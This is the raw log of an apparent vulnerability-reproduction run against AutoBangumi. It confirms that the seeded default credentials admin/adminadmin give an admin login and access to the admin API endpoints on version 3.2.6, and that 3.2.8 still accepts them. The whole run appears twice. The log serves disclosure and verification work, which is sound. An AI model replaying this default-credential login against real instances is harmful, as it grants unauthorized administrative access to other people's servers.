========== VULNERABLE 3.2.6 attempt 1 ==========
[+] attempt 1: startup seeded default admin user (add_default_user)
[*] attempt 1: POST /api/v1/auth/login admin/adminadmin
{
  "method": "POST",
  "path": "/api/v1/auth/login",
  "status": 200,
  "set_cookie": "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTc4MzE3NTc3Mn0.1tAcKf6lpeL3UM9PC3CUMwAd-kxI3r2cBCGpACOmK5Q; HttpOnly; Max-Age=86400; Path=/; SameSite=lax",
  "body": "{\"access_token\":\"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTc4MzE3NTc3Mn0.1tAcKf6lpeL3UM9PC3CUMwAd-kxI3r2cBCGpACOmK5Q\",\"token_type\":\"bearer\"}",
  "jwt_payload": null
}
[+] attempt 1: LOGIN SUCCEEDED with default credentials (HTTP 200 + admin JWT)
[*] attempt 1: accessing admin-only endpoints with the session cookie
{
  "method": "GET",
  "path": "/api/v1/rss",
  "status": 200,
  "set_cookie": null,
  "body": "[]",
  "jwt_payload": null
}
{
  "method": "GET",
  "path": "/api/v1/log",
  "status": 200,
  "set_cookie": null,
  "body": "[2026-07-03 22:36:10] INFO: INFO::uvicorn.error:Started server process [7]\n[2026-07-03 22:36:10] INFO: INFO::uvicorn.error:Waiting for application startup.\n[2026-07-03 22:36:10] INFO: INFO::module.core.program:\n[2026-07-03 22:36:10] INFO: INFO::module.core.program: _ ____ _\n[2026-07-03 22:36:10] INFO: INFO::module.core.program: /\\ | | | _ \\ (_)\n[2026-07-03 22:36:10] INFO: INFO::module.core.program: / \\ _ _| |_ ___ | |_) | __ _ _ __ __ _ _ _ _ __ ___ _\n[2026-07-03 22:36:10] INFO: INFO::module.core.program: / /\\ \\| | | | __/ _ \\| _ < / _` | '_ \\ / _` | | | | '_ ` _ \\| |\n[2026-07-03 22:36:10] INFO: INFO::module.core.program: / ____ \\ |_| | || (_) | |_) | (_| | | | | (_| | |_| | | | | | | |\n[2026-07-03 22:36:10] INFO: INFO::module.core.program:/_/ \\_\\__,_|\\__\\___/|____/ \\__,_|_| |_|\\__, |\\__,_|_| |_| |_|_|\n[2026-07-03 22:36:10] INFO: INFO::module.core.program: __/ |\n[2026-07-03 22:36:10] INFO: INFO::module.core.program: |___/\n[2026-07-03 22:36:10] INFO: INFO::module.core.program:Version 3.2.6 Author: EstrellaXD Twitter: https://twitter.com/Estrella_Pan\n[2026-07-03 22:36:10] INFO: INFO::module.core.program:GitHub: https://github.com/EstrellaXD/Auto_Bangumi/\n[2026-07-03 22:36:10] INFO: INFO::module.core.program:Starting AutoBangumi...\n[2026-07-03 22:36:11] INFO: INFO::module.database.combine:[Database] Schema version is now 9.\n[2026-07-03 22:36:11] INFO: INFO::module.database.user:[Database] Created default admin user\n[2026-07-03 22:36:11] INFO: INFO::module.core.program:[Core] No db file exists, create database file.\n[2026-07-03 22:36:11] INFO: INFO::uvicorn.error:Application startup complete.\n[2026-07-03 22:36:11] INFO: INFO::uvicorn.error:Uvicorn running on http://0.0.0.0:7892 (Press CTRL+C to quit)\n",
  "jwt_payload": null
}
[+] attempt 1: ADMIN ACCESS CONFIRMED (/api/v1/rss and /api/v1/log returned 200 with data)

========== VULNERABLE 3.2.6 attempt 2 ==========
[+] attempt 2: startup seeded default admin user (add_default_user)
[*] attempt 2: POST /api/v1/auth/login admin/adminadmin
{
  "method": "POST",
  "path": "/api/v1/auth/login",
  "status": 200,
  "set_cookie": "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTc4MzE3NTc3Nn0.gIEJQSAYU8f9pe6VwZySCtC-RGqh_elum6lqg1cQqzE; HttpOnly; Max-Age=86400; Path=/; SameSite=lax",
  "body": "{\"access_token\":\"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTc4MzE3NTc3Nn0.gIEJQSAYU8f9pe6VwZySCtC-RGqh_elum6lqg1cQqzE\",\"token_type\":\"bearer\"}",
  "jwt_payload": null
}
[+] attempt 2: LOGIN SUCCEEDED with default credentials (HTTP 200 + admin JWT)
[*] attempt 2: accessing admin-only endpoints with the session cookie
{
  "method": "GET",
  "path": "/api/v1/rss",
  "status": 200,
  "set_cookie": null,
  "body": "[]",
  "jwt_payload": null
}
{
  "method": "GET",
  "path": "/api/v1/log",
  "status": 200,
  "set_cookie": null,
  "body": "[2026-07-03 22:36:15] INFO: INFO::uvicorn.error:Started server process [7]\n[2026-07-03 22:36:15] INFO: INFO::uvicorn.error:Waiting for application startup.\n[2026-07-03 22:36:15] INFO: INFO::module.core.program:\n[2026-07-03 22:36:15] INFO: INFO::module.core.program: _ ____ _\n[2026-07-03 22:36:15] INFO: INFO::module.core.program: /\\ | | | _ \\ (_)\n[2026-07-03 22:36:15] INFO: INFO::module.core.program: / \\ _ _| |_ ___ | |_) | __ _ _ __ __ _ _ _ _ __ ___ _\n[2026-07-03 22:36:15] INFO: INFO::module.core.program: / /\\ \\| | | | __/ _ \\| _ < / _` | '_ \\ / _` | | | | '_ ` _ \\| |\n[2026-07-03 22:36:15] INFO: INFO::module.core.program: / ____ \\ |_| | || (_) | |_) | (_| | | | | (_| | |_| | | | | | | |\n[2026-07-03 22:36:15] INFO: INFO::module.core.program:/_/ \\_\\__,_|\\__\\___/|____/ \\__,_|_| |_|\\__, |\\__,_|_| |_| |_|_|\n[2026-07-03 22:36:15] INFO: INFO::module.core.program: __/ |\n[2026-07-03 22:36:15] INFO: INFO::module.core.program: |___/\n[2026-07-03 22:36:15] INFO: INFO::module.core.program:Version 3.2.6 Author: EstrellaXD Twitter: https://twitter.com/Estrella_Pan\n[2026-07-03 22:36:15] INFO: INFO::module.core.program:GitHub: https://github.com/EstrellaXD/Auto_Bangumi/\n[2026-07-03 22:36:15] INFO: INFO::module.core.program:Starting AutoBangumi...\n[2026-07-03 22:36:15] INFO: INFO::module.database.combine:[Database] Schema version is now 9.\n[2026-07-03 22:36:15] INFO: INFO::module.database.user:[Database] Created default admin user\n[2026-07-03 22:36:15] INFO: INFO::module.core.program:[Core] No db file exists, create database file.\n[2026-07-03 22:36:15] INFO: INFO::uvicorn.error:Application startup complete.\n[2026-07-03 22:36:15] INFO: INFO::uvicorn.error:Uvicorn running on http://0.0.0.0:7892 (Press CTRL+C to quit)\n",
  "jwt_payload": null
}
[+] attempt 2: ADMIN ACCESS CONFIRMED (/api/v1/rss and /api/v1/log returned 200 with data)

========== FIXED 3.2.8 (negative control) attempt 1 ==========
[!] fixed attempt 1: 3.2.8 STILL seeds default admin user on empty DB
[*] fixed attempt 1: POST /api/v1/auth/login admin/adminadmin
{
  "method": "POST",
  "path": "/api/v1/auth/login",
  "status": 200,
  "set_cookie": "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTc4MzE3NTc4MX0.Xni8lIOHs6xr6FM5-Fg1wehDPI_yQXHlFDQrtro0_3c; HttpOnly; Max-Age=86400; Path=/; SameSite=lax",
  "body": "{\"access_token\":\"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTc4MzE3NTc4MX0.Xni8lIOHs6xr6FM5-Fg1wehDPI_yQXHlFDQrtro0_3c\",\"token_type\":\"bearer\"}",
  "jwt_payload": null
}
[!] fixed attempt 1: 3.2.8 STILL accepts default-credential login (HTTP 200)

========== FIXED 3.2.8 (negative control) attempt 2 ==========
[!] fixed attempt 2: 3.2.8 STILL seeds default admin user on empty DB
[*] fixed attempt 2: POST /api/v1/auth/login admin/adminadmin
{
  "method": "POST",
  "path": "/api/v1/auth/login",
  "status": 200,
  "set_cookie": "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTc4MzE3NTc4NX0.kGhrV2NofRxSRYj9peElgu1Z-qotBKZDwD1hps4SukA; HttpOnly; Max-Age=86400; Path=/; SameSite=lax",
  "body": "{\"access_token\":\"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTc4MzE3NTc4NX0.kGhrV2NofRxSRYj9peElgu1Z-qotBKZDwD1hps4SukA\",\"token_type\":\"bearer\"}",
  "jwt_payload": null
}
[!] fixed attempt 2: 3.2.8 STILL accepts default-credential login (HTTP 200)

================ SUMMARY ================
VULN_SEED_LOG=1
VULN_LOGIN_OK=1
VULN_ADMIN_ACCESS_OK=1
FIXED_SEED_LOG=1
FIXED_LOGIN_OK=1
SOURCE_NOTE=add_default_user seeds admin/adminadmin (confirmed in source)
[===] VULNERABILITY CONFIRMED: default admin/adminadmin credentials allow full admin login on AutoBangumi < 3.2.8
[===] NOTE: negative control shows 3.2.8 still accepts the default credentials; the referenced fix commit (487bdfec) addresses the SSRF issue (#1041), not the default-credentials seeding.
========== VULNERABLE 3.2.6 attempt 1 ==========
[+] attempt 1: startup seeded default admin user (add_default_user)
[*] attempt 1: POST /api/v1/auth/login admin/adminadmin
{
  "method": "POST",
  "path": "/api/v1/auth/login",
  "status": 200,
  "set_cookie": "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTc4MzE3NTgwMX0.jDI6Q-jmEsXcdQDFLvj9qCnzvnzNh2pvenu3d-3E2tE; HttpOnly; Max-Age=86400; Path=/; SameSite=lax",
  "body": "{\"access_token\":\"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTc4MzE3NTgwMX0.jDI6Q-jmEsXcdQDFLvj9qCnzvnzNh2pvenu3d-3E2tE\",\"token_type\":\"bearer\"}",
  "jwt_payload": null
}
[+] attempt 1: LOGIN SUCCEEDED with default credentials (HTTP 200 + admin JWT)
[*] attempt 1: accessing admin-only endpoints with the session cookie
{
  "method": "GET",
  "path": "/api/v1/rss",
  "status": 200,
  "set_cookie": null,
  "body": "[]",
  "jwt_payload": null
}
{
  "method": "GET",
  "path": "/api/v1/log",
  "status": 200,
  "set_cookie": null,
  "body": "[2026-07-03 22:36:39] INFO: INFO::uvicorn.error:Started server process [7]\n[2026-07-03 22:36:39] INFO: INFO::uvicorn.error:Waiting for application startup.\n[2026-07-03 22:36:39] INFO: INFO::module.core.program:\n[2026-07-03 22:36:39] INFO: INFO::module.core.program: _ ____ _\n[2026-07-03 22:36:39] INFO: INFO::module.core.program: /\\ | | | _ \\ (_)\n[2026-07-03 22:36:39] INFO: INFO::module.core.program: / \\ _ _| |_ ___ | |_) | __ _ _ __ __ _ _ _ _ __ ___ _\n[2026-07-03 22:36:39] INFO: INFO::module.core.program: / /\\ \\| | | | __/ _ \\| _ < / _` | '_ \\ / _` | | | | '_ ` _ \\| |\n[2026-07-03 22:36:39] INFO: INFO::module.core.program: / ____ \\ |_| | || (_) | |_) | (_| | | | | (_| | |_| | | | | | | |\n[2026-07-03 22:36:39] INFO: INFO::module.core.program:/_/ \\_\\__,_|\\__\\___/|____/ \\__,_|_| |_|\\__, |\\__,_|_| |_| |_|_|\n[2026-07-03 22:36:39] INFO: INFO::module.core.program: __/ |\n[2026-07-03 22:36:39] INFO: INFO::module.core.program: |___/\n[2026-07-03 22:36:39] INFO: INFO::module.core.program:Version 3.2.6 Author: EstrellaXD Twitter: https://twitter.com/Estrella_Pan\n[2026-07-03 22:36:39] INFO: INFO::module.core.program:GitHub: https://github.com/EstrellaXD/Auto_Bangumi/\n[2026-07-03 22:36:39] INFO: INFO::module.core.program:Starting AutoBangumi...\n[2026-07-03 22:36:40] INFO: INFO::module.database.combine:[Database] Schema version is now 9.\n[2026-07-03 22:36:40] INFO: INFO::module.database.user:[Database] Created default admin user\n[2026-07-03 22:36:40] INFO: INFO::module.core.program:[Core] No db file exists, create database file.\n[2026-07-03 22:36:40] INFO: INFO::uvicorn.error:Application startup complete.\n[2026-07-03 22:36:40] INFO: INFO::uvicorn.error:Uvicorn running on http://0.0.0.0:7892 (Press CTRL+C to quit)\n",
  "jwt_payload": null
}
[+] attempt 1: ADMIN ACCESS CONFIRMED (/api/v1/rss and /api/v1/log returned 200 with data)

========== VULNERABLE 3.2.6 attempt 2 ==========
[+] attempt 2: startup seeded default admin user (add_default_user)
[*] attempt 2: POST /api/v1/auth/login admin/adminadmin
{
  "method": "POST",
  "path": "/api/v1/auth/login",
  "status": 200,
  "set_cookie": "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTc4MzE3NTgwNX0.W7p9yJcfDiSMDQOvcbJSLnDi4uw8y8DxzBvXrNwfNbk; HttpOnly; Max-Age=86400; Path=/; SameSite=lax",
  "body": "{\"access_token\":\"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTc4MzE3NTgwNX0.W7p9yJcfDiSMDQOvcbJSLnDi4uw8y8DxzBvXrNwfNbk\",\"token_type\":\"bearer\"}",
  "jwt_payload": null
}
[+] attempt 2: LOGIN SUCCEEDED with default credentials (HTTP 200 + admin JWT)
[*] attempt 2: accessing admin-only endpoints with the session cookie
{
  "method": "GET",
  "path": "/api/v1/rss",
  "status": 200,
  "set_cookie": null,
  "body": "[]",
  "jwt_payload": null
}
{
  "method": "GET",
  "path": "/api/v1/log",
  "status": 200,
  "set_cookie": null,
  "body": "[2026-07-03 22:36:44] INFO: INFO::uvicorn.error:Started server process [7]\n[2026-07-03 22:36:44] INFO: INFO::uvicorn.error:Waiting for application startup.\n[2026-07-03 22:36:44] INFO: INFO::module.core.program:\n[2026-07-03 22:36:44] INFO: INFO::module.core.program: _ ____ _\n[2026-07-03 22:36:44] INFO: INFO::module.core.program: /\\ | | | _ \\ (_)\n[2026-07-03 22:36:44] INFO: INFO::module.core.program: / \\ _ _| |_ ___ | |_) | __ _ _ __ __ _ _ _ _ __ ___ _\n[2026-07-03 22:36:44] INFO: INFO::module.core.program: / /\\ \\| | | | __/ _ \\| _ < / _` | '_ \\ / _` | | | | '_ ` _ \\| |\n[2026-07-03 22:36:44] INFO: INFO::module.core.program: / ____ \\ |_| | || (_) | |_) | (_| | | | | (_| | |_| | | | | | | |\n[2026-07-03 22:36:44] INFO: INFO::module.core.program:/_/ \\_\\__,_|\\__\\___/|____/ \\__,_|_| |_|\\__, |\\__,_|_| |_| |_|_|\n[2026-07-03 22:36:44] INFO: INFO::module.core.program: __/ |\n[2026-07-03 22:36:44] INFO: INFO::module.core.program: |___/\n[2026-07-03 22:36:44] INFO: INFO::module.core.program:Version 3.2.6 Author: EstrellaXD Twitter: https://twitter.com/Estrella_Pan\n[2026-07-03 22:36:44] INFO: INFO::module.core.program:GitHub: https://github.com/EstrellaXD/Auto_Bangumi/\n[2026-07-03 22:36:44] INFO: INFO::module.core.program:Starting AutoBangumi...\n[2026-07-03 22:36:44] INFO: INFO::module.database.combine:[Database] Schema version is now 9.\n[2026-07-03 22:36:44] INFO: INFO::module.database.user:[Database] Created default admin user\n[2026-07-03 22:36:44] INFO: INFO::module.core.program:[Core] No db file exists, create database file.\n[2026-07-03 22:36:44] INFO: INFO::uvicorn.error:Application startup complete.\n[2026-07-03 22:36:44] INFO: INFO::uvicorn.error:Uvicorn running on http://0.0.0.0:7892 (Press CTRL+C to quit)\n",
  "jwt_payload": null
}
[+] attempt 2: ADMIN ACCESS CONFIRMED (/api/v1/rss and /api/v1/log returned 200 with data)

========== FIXED 3.2.8 (negative control) attempt 1 ==========
[!] fixed attempt 1: 3.2.8 STILL seeds default admin user on empty DB
[*] fixed attempt 1: POST /api/v1/auth/login admin/adminadmin
{
  "method": "POST",
  "path": "/api/v1/auth/login",
  "status": 200,
  "set_cookie": "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTc4MzE3NTgxMH0.zKMG2oobFdi7yZyEqp2g8A5Zd1510Mr18zgkFwbiuYk; HttpOnly; Max-Age=86400; Path=/; SameSite=lax",
  "body": "{\"access_token\":\"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTc4MzE3NTgxMH0.zKMG2oobFdi7yZyEqp2g8A5Zd1510Mr18zgkFwbiuYk\",\"token_type\":\"bearer\"}",
  "jwt_payload": null
}
[!] fixed attempt 1: 3.2.8 STILL accepts default-credential login (HTTP 200)

========== FIXED 3.2.8 (negative control) attempt 2 ==========
[!] fixed attempt 2: 3.2.8 STILL seeds default admin user on empty DB
[*] fixed attempt 2: POST /api/v1/auth/login admin/adminadmin
{
  "method": "POST",
  "path": "/api/v1/auth/login",
  "status": 200,
  "set_cookie": "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTc4MzE3NTgxNH0._tDp1JVUdbW_hUGXKU32dSt4X8HHxwv3AhGE3GgEDYk; HttpOnly; Max-Age=86400; Path=/; SameSite=lax",
  "body": "{\"access_token\":\"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTc4MzE3NTgxNH0._tDp1JVUdbW_hUGXKU32dSt4X8HHxwv3AhGE3GgEDYk\",\"token_type\":\"bearer\"}",
  "jwt_payload": null
}
[!] fixed attempt 2: 3.2.8 STILL accepts default-credential login (HTTP 200)

================ SUMMARY ================
VULN_SEED_LOG=1
VULN_LOGIN_OK=1
VULN_ADMIN_ACCESS_OK=1
FIXED_SEED_LOG=1
FIXED_LOGIN_OK=1
SOURCE_NOTE=add_default_user seeds admin/adminadmin (confirmed in source)
[===] VULNERABILITY CONFIRMED: default admin/adminadmin credentials allow full admin login on AutoBangumi < 3.2.8
[===] NOTE: negative control shows 3.2.8 still accepts the default credentials; the referenced fix commit (487bdfec) addresses the SSRF issue (#1041), not the default-credentials seeding.